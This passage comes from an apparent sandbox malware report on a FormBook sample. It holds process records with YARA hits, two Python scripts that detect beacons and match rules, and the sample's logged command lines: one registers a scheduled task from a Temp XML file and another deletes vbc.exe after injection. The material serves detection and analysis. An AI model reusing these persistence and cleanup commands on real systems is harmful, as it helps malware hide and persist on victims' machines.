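    Query values are kept verbatim: parse_qs would turn the '+' inside the
    blob into a space and break the base64 check."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    query = []
    if parts.query:
        for pair in parts.query.split("&"):
            name, _, value = pair.partition("=")
            query.append((name, value))
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": parts.path, "query": query, "headers": headers}


def beacon_indicators(session: dict) -> list:
    """Name every indicator the session exhibits; an empty list means none."""
    req = parse_request(session["request"])
    hits = []
    if req["method"] == "GET" and ONE_DIR_PATH.match(req["path"]):
        hits.append("single-directory-path")
    if len(req["query"]) == 2:
        short, long_ = sorted((v for _, v in req["query"]), key=len)
        if len(short) <= 8 and BASE64ISH.match(long_):
            hits.append("short-tag-plus-base64-blob")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("connection-close")
    if session["process"].rsplit("\\", 1)[-1].lower() in SYSTEM_HTTP_CLIENTS:
        hits.append("system-process-http")
    return hits


def is_suspected_beacon(session: dict) -> bool:
    """The query shape is the load-bearing signal; require it plus two more."""
    hits = beacon_indicators(session)
    return "short-tag-plus-base64-blob" in hits and len(hits) >= 3


def suspected_hosts(sessions) -> list:
    """Host headers of every flagged session, in order, for blocklist review."""
    return [parse_request(s["request"])["headers"].get("host", "")
            for s in sessions if is_suspected_beacon(s)]


if __name__ == "__main__":
    for s in SESSIONS:
        print(parse_request(s["request"])["headers"]["host"],
              is_suspected_beacon(s), beacon_indicators(s))
```

The scoring deliberately treats the query shape as necessary rather than sufficient: plenty of legitimate trackers send base64 blobs, so the verdict also needs the odd path and either the system-process origin or the connection handling before a session is flagged.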


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior


                                                                            System Behavior

                                                                            General

                                                                            Start time:21:03:35
                                                                            Start date:13/01/2021
                                                                            Path:C:\Users\user\Desktop\J0OmHIagw8.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\J0OmHIagw8.exe'
                                                                            Imagebase:0xe50000
                                                                            File size:582656 bytes
                                                                            MD5 hash:92FF500A693078263908C83B4B290481
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:21:03:39
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
                                                                            Imagebase:0xe0000
                                                                            File size:185856 bytes
                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:03:39
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:03:40
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:{path}
                                                                            Imagebase:0x8a0000
                                                                            File size:2688096 bytes
                                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:21:03:41
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:{path}
                                                                            Imagebase:0x8a0000
                                                                            File size:2688096 bytes
                                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:21:03:44
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff714890000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:03:56
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\control.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\control.exe
                                                                            Imagebase:0xb80000
                                                                            File size:114688 bytes
                                                                            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:21:04:00
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
                                                                            Imagebase:0x200000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:04:01
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
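The process blocks above record the behaviour the signatures summarise: schtasks.exe registers a task named under Updates\ from an XML file staged in the user's Temp directory (the "Scheduled temp file as task from temp location" Sigma hit), the FormBook payload runs inside vbc.exe and explorer.exe rather than in the dropped file, and cmd.exe is then asked to delete the vbc.exe binary. The Python below is an added example, not part of the report: it turns two of those command lines into detection rules over constructed process-creation records. Only image path and command line are used, because this section of the report does not show parent processes; the report's single-quote rendering is reproduced, and the tokenizer also accepts the double quotes a real Sysmon or 4688 event would carry. The benign schtasks record and the Vendor\Updater task are hypothetical.

```python
import re

# Constructed process-creation records modelled on the command lines in the
# process blocks above (image path and command line only; the report's quoting
# is reproduced with single quotes). The last record is a hypothetical benign
# schtasks invocation added for contrast; it is not from the report.
EVENTS = [
    {"image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' "
                r"/XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'"},
    {"image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'"},
    {"image": r"C:\Windows\System32\schtasks.exe",  # hypothetical benign
     "cmdline": r"schtasks.exe /Create /TN 'Vendor\Updater' /XML 'C:\ProgramData\Vendor\updater.xml'"},
]

# Quoted paths stay whole; both quote styles are accepted.
TOKEN = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")
# Writable staging locations a task definition should never be loaded from.
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def tokenize(cmdline: str) -> list:
    """Split on whitespace while keeping quoted paths whole, then drop quotes."""
    return [t.strip("'\"") for t in TOKEN.findall(cmdline)]


def arg_after(tokens: list, flag: str):
    """Value following a case-insensitive flag such as /XML, or None."""
    low = [t.lower() for t in tokens]
    if flag in low and low.index(flag) + 1 < len(tokens):
        return tokens[low.index(flag) + 1]
    return None


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_temp_dir(path: str) -> bool:
    p = path.lower()
    return any(d in p for d in TEMP_DIRS)


def match_rules(event: dict) -> list:
    """Return the names of the rules an event matches."""
    image = basename(event["image"])
    tokens = tokenize(event["cmdline"])
    low = [t.lower() for t in tokens]
    hits = []
    # Persistence: a task registered from an XML definition staged in Temp.
    if image == "schtasks.exe" and "/create" in low:
        xml = arg_after(tokens, "/xml")
        if xml and in_temp_dir(xml):
            hits.append("scheduled-task-from-temp-xml")
    # Cleanup: cmd.exe asked to delete a binary under the Windows directory,
    # here the vbc.exe the injected code had been running in.
    if image == "cmd.exe" and "/c" in low and "del" in low:
        if any(t.lower().startswith("c:\\windows\\") for t in tokens):
            hits.append("cmd-deletes-windows-binary")
    return hits


def triage(events) -> list:
    """(image basename, matched rules) for every event that matched something."""
    out = []
    for e in events:
        hits = match_rules(e)
        if hits:
            out.append((basename(e["image"]), hits))
    return out


if __name__ == "__main__":
    for row in triage(EVENTS):
        print(row)
```

Both rules key on the argument that matters rather than on the tool: schtasks.exe and cmd.exe are everywhere, but a task definition read from AppData\Local\Temp, or a del aimed into C:\Windows, is rare enough in normal telemetry to be worth a ticket on its own.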

                                                                            Disassembly

                                                                            Code Analysis
